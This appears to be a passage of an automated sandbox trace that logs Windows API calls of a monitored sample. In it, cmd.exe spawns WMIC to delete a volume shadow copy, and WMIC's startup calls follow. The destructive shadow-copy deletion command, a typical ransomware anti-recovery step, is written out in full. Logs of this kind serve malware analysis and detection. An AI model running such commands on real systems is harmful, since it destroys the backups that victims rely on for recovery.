returned -5 [0111.515] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0111.515] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0111.515] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0111.515] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0111.515] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0111.515] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0111.515] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0111.515] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0111.515] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0111.515] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0111.515] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0111.515] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0111.515] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0111.515] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0111.515] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0111.515] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0111.515] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0111.515] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0111.515] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0111.515] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0111.515] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0111.515] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0111.516] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0111.516] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0111.516] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0111.516] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0111.516] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0111.516] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0111.516] GetProcessHeap () returned 0x3b0000 [0111.516] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3c46f0 | out: hHeap=0x3b0000) returned 1 [0111.516] GetProcessHeap () returned 0x3b0000 [0111.516] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x12) returned 0x3c8a30 [0111.516] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0111.517] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\wbem\\WMIC.exe", lpCommandLine="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1EE90775-4E53-4C29-811E-F4996057D94E}'\" delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x26f270*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1EE90775-4E53-4C29-811E-F4996057D94E}'\" delete", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26f220 | out: lpCommandLine="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1EE90775-4E53-4C29-811E-F4996057D94E}'\" delete", lpProcessInformation=0x26f220*(hProcess=0x54, hThread=0x50, dwProcessId=0xa90, dwThreadId=0xb08)) returned 1 [0111.525] CloseHandle (hObject=0x50) returned 1 [0111.526] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0111.526] GetProcessHeap () returned 0x3b0000 [0111.526] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3cc360 | out: hHeap=0x3b0000) returned 1 [0111.526] GetEnvironmentStringsW () returned 0x3cad60* [0111.526] GetProcessHeap () returned 0x3b0000 [0111.526] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xae8) returned 0x3cb850 [0111.526] FreeEnvironmentStringsW (penv=0x3cad60) returned 1 [0111.526] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0113.340] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x26f168 | out: lpExitCode=0x26f168*=0x0) returned 1 [0113.340] CloseHandle (hObject=0x54) returned 1 [0113.340] _vsnwprintf (in: _Buffer=0x26f3d8, _BufferCount=0x13, _Format="%08X", _ArgList=0x26f178 | out: _Buffer="00000000") returned 8 [0113.340] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0113.340] GetProcessHeap () returned 0x3b0000 [0113.340] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3cb850 | out: hHeap=0x3b0000) returned 1 [0113.340] GetEnvironmentStringsW () returned 0x3cad60* [0113.340] GetProcessHeap () returned 0x3b0000 [0113.340] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xb0e) returned 0x3cb880 [0113.340] FreeEnvironmentStringsW (penv=0x3cad60) returned 1 [0113.340] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0113.341] GetProcessHeap () returned 0x3b0000 [0113.341] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3cb880 | out: hHeap=0x3b0000) returned 1 [0113.341] GetEnvironmentStringsW () returned 0x3cad60* [0113.341] GetProcessHeap () returned 0x3b0000 [0113.341] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xb0e) returned 0x3cb880 [0113.341] FreeEnvironmentStringsW (penv=0x3cad60) returned 1 [0113.341] GetProcessHeap () returned 0x3b0000 [0113.341] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3c8a30 | out: hHeap=0x3b0000) returned 1 [0113.341] DeleteProcThreadAttributeList (in: lpAttributeList=0x26f238 | out: lpAttributeList=0x26f238) [0113.341] _get_osfhandle (_FileHandle=1) returned 0x7 [0113.341] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0113.341] _get_osfhandle (_FileHandle=1) returned 0x7 [0113.341] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49ede194 | out: lpMode=0x49ede194) returned 1 [0113.341] _get_osfhandle (_FileHandle=0) returned 0x3 [0113.341] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49ede198 | out: lpMode=0x49ede198) returned 1 [0113.342] SetConsoleInputExeNameW () returned 0x1 [0113.342] GetConsoleOutputCP () returned 0x1b5 [0113.342] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49eebfe0 | out: lpCPInfo=0x49eebfe0) returned 1 [0113.342] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0113.342] exit (_Code=0) Process: id = "37" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x70a56000" os_pid = "0xa90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "36" os_parent_pid = "0x8bc" cmd_line = "C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1EE90775-4E53-4C29-811E-F4996057D94E}'\" delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 208 os_tid = 0xb08 [0111.565] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xaf9b0 | out: lpSystemTimeAsFileTime=0xaf9b0*(dwLowDateTime=0x4a0ee9f0, dwHighDateTime=0x1d68245)) [0111.565] GetCurrentProcessId () returned 0xa90 [0111.565] GetCurrentThreadId () returned 0xb08 [0111.565] GetTickCount () returned 0x1151852 [0111.565] QueryPerformanceCounter (in: lpPerformanceCount=0xaf9b8 | out: lpPerformanceCount=0xaf9b8*=23145791892) returned 1 [0111.568] GetModuleHandleW (lpModuleName=0x0) returned 0xff4b0000 [0111.568] __set_app_type (_Type=0x1) [0111.568] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff4fced0) returned 0x0 [0111.568] __wgetmainargs (in: _Argc=0xff522380, _Argv=0xff522390, _Env=0xff522388, _DoWildCard=0, _StartInfo=0xff52239c | out: _Argc=0xff522380, _Argv=0xff522390, _Env=0xff522388) returned 0 [0111.569] ??0CHString@@QEAA@XZ () returned 0xff522ab0 [0111.569] malloc (_Size=0x30) returned 0x455a50 [0111.569] malloc (_Size=0x70) returned 0x455a90 [0111.569] malloc (_Size=0x50) returned 0x457d30 [0111.569] malloc (_Size=0x30) returned 0x457d90 [0111.569] malloc (_Size=0x48) returned 0x457dd0 [0111.569] malloc (_Size=0x30) returned 0x457e20 [0111.569] malloc (_Size=0x30) returned 0x457e60 [0111.569] ??0CHString@@QEAA@XZ () returned 0xff522f58 [0111.569] malloc (_Size=0x30) returned 0x457ea0 [0111.569] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0111.570] SetConsoleCtrlHandler (HandlerRoutine=0xff4f5724, Add=1) returned 1 [0111.570] _onexit (_Func=0xff50f378) returned 0xff50f378 [0111.570] _onexit (_Func=0xff50f490) returned 0xff50f490 [0111.570] _onexit (_Func=0xff50f4d0) returned 0xff50f4d0 [0111.570] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0111.570] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0111.574] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0111.581] CoCreateInstance (in: rclsid=0xff4b73a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff4b7370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xff522940 | out: ppv=0xff522940*=0x1dd1390) returned 0x0 [0111.589] GetCurrentProcess () returned 0xffffffffffffffff [0111.589] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0xaf780 | out: TokenHandle=0xaf780*=0xf4) returned 1 [0111.589] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xaf778 | out: TokenInformation=0x0, ReturnLength=0xaf778) returned 0 [0111.589] malloc (_Size=0x118) returned 0x4569a0 [0111.589] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x4569a0, TokenInformationLength=0x118, ReturnLength=0xaf778 | out: TokenInformation=0x4569a0, ReturnLength=0xaf778) returned 1 [0111.589] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0x4569a0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=651720512, Attributes=0xe8ca), (Luid.LowPart=0x0, Luid.HighPart=4554464, Attributes=0x0), (Luid.LowPart=0x64006e, Luid.HighPart=7798895, Attributes=0x3b0073), (Luid.LowPart=0x57005c, Luid.HighPart=7209065, Attributes=0x6f0064), (Luid.LowPart=0x53005c, Luid.HighPart=7536761, Attributes=0x650074), (Luid.LowPart=0x5c0032, Luid.HighPart=6422615, Attributes=0x6d0065))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0111.589] free (_Block=0x4569a0) [0111.589] CloseHandle (hObject=0xf4) returned 1 [0111.590] malloc (_Size=0x40) returned 0x457ee0 [0111.590] malloc (_Size=0x40) returned 0x457f30 [0111.590] malloc (_Size=0x40) returned 0x457f80 [0111.590] malloc (_Size=0x20a) returned 0x4569a0 [0111.590] GetSystemDirectoryW (in: lpBuffer=0x4569a0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0111.590] free (_Block=0x4569a0) [0111.590] malloc (_Size=0x18) returned 0x29dfb0 [0111.590] malloc (_Size=0x18) returned 0x4569a0 [0111.590] malloc (_Size=0x18) returned 0x4569c0 [0111.590] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0111.590] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0111.590] free (_Block=0x29dfb0) [0111.590] free (_Block=0x4569a0) [0111.590] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77940000 [0111.591] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0111.591] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0111.591] FreeLibrary (hLibModule=0x77940000) returned 1 [0111.591] free (_Block=0x4569c0) [0111.591] _vsnwprintf (in: _Buffer=0x457f80, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0xaf3a8 | out: _Buffer="ms_409") returned 6 [0111.591] malloc (_Size=0x20) returned 0x4569a0 [0111.591] GetComputerNameW (in: lpBuffer=0x4569a0, nSize=0xaf780 | out: lpBuffer="XDUWTFONO", nSize=0xaf780) returned 1 [0111.592] lstrlenW (lpString="XDUWTFONO") returned 9 [0111.592] malloc (_Size=0x14) returned 0x29dfb0 [0111.592] lstrlenW (lpString="XDUWTFONO") returned 9 [0111.592] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0xaf778 | out: lpNameBuffer=0x0, nSize=0xaf778) returned 0x7fffffde000 [0111.593] GetLastError () returned 0xea [0111.593] malloc (_Size=0x40) returned 0x4569d0 [0111.593] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x4569d0, nSize=0xaf778 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xaf778) returned 0x1 [0111.593] lstrlenW (lpString="") returned 0 [0111.593] lstrlenW (lpString="XDUWTFONO") returned 9 [0111.593] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0111.594] lstrlenW (lpString=".") returned 1 [0111.594] lstrlenW (lpString="XDUWTFONO") returned 9 [0111.594] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0111.594] lstrlenW (lpString="LOCALHOST") returned 9 [0111.594] lstrlenW (lpString="XDUWTFONO") returned 9 [0111.594] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0111.595] lstrlenW (lpString="XDUWTFONO") returned 9 [0111.595] lstrlenW (lpString="XDUWTFONO") returned 9 [0111.595] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0111.595] free (_Block=0x29dfb0) [0111.595] lstrlenW (lpString="XDUWTFONO") returned 9 [0111.595] malloc (_Size=0x14) returned 0x29dfb0 [0111.595] lstrlenW (lpString="XDUWTFONO") returned 9 [0111.595] lstrlenW (lpString="XDUWTFONO") returned 9 [0111.595] malloc (_Size=0x14) returned 0x456a20 [0111.595] lstrlenW (lpString="XDUWTFONO") returned 9 [0111.595] malloc (_Size=0x8) returned 0x456a40 [0111.595] malloc (_Size=0x18) returned 0x456a60 [0111.595] malloc (_Size=0x30) returned 0x456a80 [0111.595] malloc (_Size=0x18) returned 0x456ac0 [0111.595] SysStringLen (param_1="IDENTIFY") returned 0x8 [0111.595] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0111.595] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0111.595] SysStringLen (param_1="IDENTIFY") returned 0x8 [0111.595] malloc (_Size=0x30) returned 0x456ae0 [0111.595] malloc (_Size=0x18) returned 0x456b20 [0111.595] SysStringLen (param_1="IMPERSONATE") returned 0xb [0111.595] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0111.595] SysStringLen (param_1="IMPERSONATE") returned 0xb [0111.596] SysStringLen (param_1="IDENTIFY") returned 0x8 [0111.596] SysStringLen (param_1="IDENTIFY") returned 0x8 [0111.596] SysStringLen (param_1="IMPERSONATE") returned 0xb [0111.596] malloc (_Size=0x30) returned 0x456b40 [0111.596] malloc (_Size=0x18) returned 0x456b80 [0111.596] SysStringLen (param_1="DELEGATE") returned 0x8 [0111.596] SysStringLen (param_1="IDENTIFY") returned 0x8 [0111.596] SysStringLen (param_1="DELEGATE") returned 0x8 [0111.596] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0111.596] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0111.596] SysStringLen (param_1="DELEGATE") returned 0x8 [0111.596] malloc (_Size=0x30) returned 0x456ba0 [0111.596] malloc (_Size=0x18) returned 0x456be0 [0111.596] malloc (_Size=0x30) returned 0x456c00 [0111.596] malloc (_Size=0x18) returned 0x456c40 [0111.596] SysStringLen (param_1="NONE") returned 0x4 [0111.596] SysStringLen (param_1="DEFAULT") returned 0x7 [0111.596] SysStringLen (param_1="DEFAULT") returned 0x7 [0111.596] SysStringLen (param_1="NONE") returned 0x4 [0111.596] malloc (_Size=0x30) returned 0x456c60 [0111.596] malloc (_Size=0x18) returned 0x456ca0 [0111.596] SysStringLen (param_1="CONNECT") returned 0x7 [0111.596] SysStringLen (param_1="DEFAULT") returned 0x7 [0111.596] malloc (_Size=0x30) returned 0x456cc0 [0111.596] malloc (_Size=0x18) returned 0x456d00 [0111.596] SysStringLen (param_1="CALL") returned 0x4 [0111.596] SysStringLen (param_1="DEFAULT") returned 0x7 [0111.597] SysStringLen (param_1="CALL") returned 0x4 [0111.597] SysStringLen (param_1="CONNECT") returned 0x7 [0111.597] malloc (_Size=0x30) returned 0x456d20 [0111.597] malloc (_Size=0x18) returned 0x456d60 [0111.597] SysStringLen (param_1="PKT") returned 0x3 [0111.597] SysStringLen (param_1="DEFAULT") returned 0x7 [0111.597] SysStringLen (param_1="PKT") returned 0x3 [0111.597] SysStringLen (param_1="NONE") returned 0x4 [0111.597] SysStringLen (param_1="NONE") returned 0x4 [0111.597] SysStringLen (param_1="PKT") returned 0x3 [0111.597] malloc (_Size=0x30) returned 0x456d80 [0111.597] malloc (_Size=0x18) returned 0x456dc0 [0111.597] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0111.597] SysStringLen (param_1="DEFAULT") returned 0x7 [0111.597] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0111.597] SysStringLen (param_1="NONE") returned 0x4 [0111.597] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0111.597] SysStringLen (param_1="PKT") returned 0x3 [0111.597] SysStringLen (param_1="PKT") returned 0x3 [0111.597] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0111.597] malloc (_Size=0x30) returned 0x458000 [0111.598] malloc (_Size=0x18) returned 0x456de0 [0111.598] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0111.598] SysStringLen (param_1="DEFAULT") returned 0x7 [0111.598] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0111.598] SysStringLen (param_1="PKT") returned 0x3 [0111.598] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0111.598] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0111.598] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0111.598] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0111.598] malloc (_Size=0x30) returned 0x458040 [0111.598] malloc (_Size=0x40) returned 0x456e00 [0111.598] malloc (_Size=0x20a) returned 0x456e50 [0111.598] GetSystemDirectoryW (in: lpBuffer=0x456e50, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0111.598] free (_Block=0x456e50) [0111.598] malloc (_Size=0x18) returned 0x456e50 [0111.598] malloc (_Size=0x18) returned 0x456e70 [0111.598] malloc (_Size=0x18) returned 0x456e90 [0111.599] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0111.599] SysStringLen (param_1="\\wbem\\") returned 0x6 [0111.599] free (_Block=0x456e50) [0111.599] free (_Block=0x456e70) [0111.599] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0111.599] free (_Block=0x456e90) [0111.599] malloc (_Size=0x18) returned 0x456e50 [0111.599] malloc (_Size=0x18) returned 0x456e70 [0111.599] malloc (_Size=0x18) returned 0x456e90 [0111.599] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0111.599] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0111.599] free (_Block=0x456e50) [0111.599] free (_Block=0x456e70) [0111.599] GetCurrentThreadId () returned 0xb08 [0111.599] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0xaf080 | out: phkResult=0xaf080*=0xf8) returned 0x0 [0111.600] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0xaf0d0, lpcbData=0xaf070*=0x400 | out: lpType=0x0, lpData=0xaf0d0*=0x30, lpcbData=0xaf070*=0x4) returned 0x0 [0111.600] _wcsicmp (_String1="0", _String2="1") returned -1 [0111.600] _wcsicmp (_String1="0", _String2="2") returned -2 [0111.600] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xaf070*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0xaf070*=0x42) returned 0x0 [0111.600] malloc (_Size=0x86) returned 0x456eb0 [0111.600] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x456eb0, lpcbData=0xaf070*=0x42 | out: lpType=0x0, lpData=0x456eb0*=0x25, lpcbData=0xaf070*=0x42) returned 0x0 [0111.600] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0111.600] malloc (_Size=0x42) returned 0x456f40 [0111.600] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0111.600] RegQueryValueExW (in: hKey=0xf8, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0xaf0d0, lpcbData=0xaf070*=0x400 | out: lpType=0x0, lpData=0xaf0d0*=0x36, lpcbData=0xaf070*=0xc) returned 0x0 [0111.600] _wtol (_String="65536") returned 65536 [0111.600] free (_Block=0x456eb0) [0111.600] RegCloseKey (hKey=0x0) returned 0x6 [0111.600] CoCreateInstance (in: rclsid=0xff4b7410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff4b73f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0xaf578 | out: ppv=0xaf578*=0x1bf71d0) returned 0x0 [0111.620] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0x1bf71d0, xmlSource=0xaf6c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x456e50), isSuccessful=0xaf730 | out: isSuccessful=0xaf730*=0xffff) returned 0x0 [0111.741] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x1bf71d0, DOMElement=0xaf570 | out: DOMElement=0xaf570) returned 0x0 [0111.741] malloc (_Size=0x18) returned 0x456e50 [0111.741] free (_Block=0x456e50) [0111.741] malloc (_Size=0x18) returned 0x456e50 [0111.741] free (_Block=0x456e50) [0111.741] malloc (_Size=0x18) returned 0x456e50 [0111.741] malloc (_Size=0x18) returned 0x456e70 [0111.742] malloc (_Size=0x30) returned 0x458080 [0111.742] malloc (_Size=0x18) returned 0x456eb0 [0111.742] free (_Block=0x456eb0) [0111.742] malloc (_Size=0x18) returned 0x45c560 [0111.742] malloc (_Size=0x18) returned 0x45c580 [0111.742] SysStringLen (param_1="VALUE") returned 0x5 [0111.742] SysStringLen (param_1="TABLE") returned 0x5 [0111.742] SysStringLen (param_1="TABLE") returned 0x5 [0111.742] SysStringLen (param_1="VALUE") returned 0x5 [0111.742] malloc (_Size=0x30) returned 0x4580c0 [0111.742] malloc (_Size=0x18) returned 0x45c5a0 [0111.742] free (_Block=0x45c5a0) [0111.743] malloc (_Size=0x18) returned 0x45c5a0 [0111.743] malloc (_Size=0x18) returned 0x45c5c0 [0111.743] SysStringLen (param_1="LIST") returned 0x4 [0111.743] SysStringLen (param_1="TABLE") returned 0x5 [0111.743] malloc (_Size=0x30) returned 0x458100 [0111.743] malloc (_Size=0x18) returned 0x45c5e0 [0111.743] free (_Block=0x45c5e0) [0111.743] malloc (_Size=0x18) returned 0x45c5e0 [0111.743] malloc (_Size=0x18) returned 0x45c600 [0111.744] SysStringLen (param_1="RAWXML") returned 0x6 [0111.744] SysStringLen (param_1="TABLE") returned 0x5 [0111.744] SysStringLen (param_1="RAWXML") returned 0x6 [0111.744] SysStringLen (param_1="LIST") returned 0x4 [0111.744] SysStringLen (param_1="LIST") returned 0x4 [0111.744] SysStringLen (param_1="RAWXML") returned 0x6 [0111.744] malloc (_Size=0x30) returned 0x458140 [0111.744] malloc (_Size=0x18) returned 0x45c620 [0111.744] free (_Block=0x45c620) [0111.744] malloc (_Size=0x18) returned 0x45c620 [0111.744] malloc (_Size=0x18) returned 0x45c640 [0111.744] SysStringLen (param_1="HTABLE") returned 0x6 [0111.744] SysStringLen (param_1="TABLE") returned 0x5 [0111.744] SysStringLen (param_1="HTABLE") returned 0x6 [0111.744] SysStringLen (param_1="LIST") returned 0x4 [0111.744] malloc (_Size=0x30) returned 0x458180 [0111.744] malloc (_Size=0x18) returned 0x45c660 [0111.745] free (_Block=0x45c660) [0111.745] malloc (_Size=0x18) returned 0x45c660 [0111.745] malloc (_Size=0x18) returned 0x45c680 [0111.745] SysStringLen (param_1="HFORM") returned 0x5 [0111.745] SysStringLen (param_1="TABLE") returned 0x5 [0111.745] SysStringLen (param_1="HFORM") returned 0x5 [0111.745] SysStringLen (param_1="LIST") returned 0x4 [0111.745] SysStringLen (param_1="HFORM") returned 0x5 [0111.745] SysStringLen (param_1="HTABLE") returned 0x6 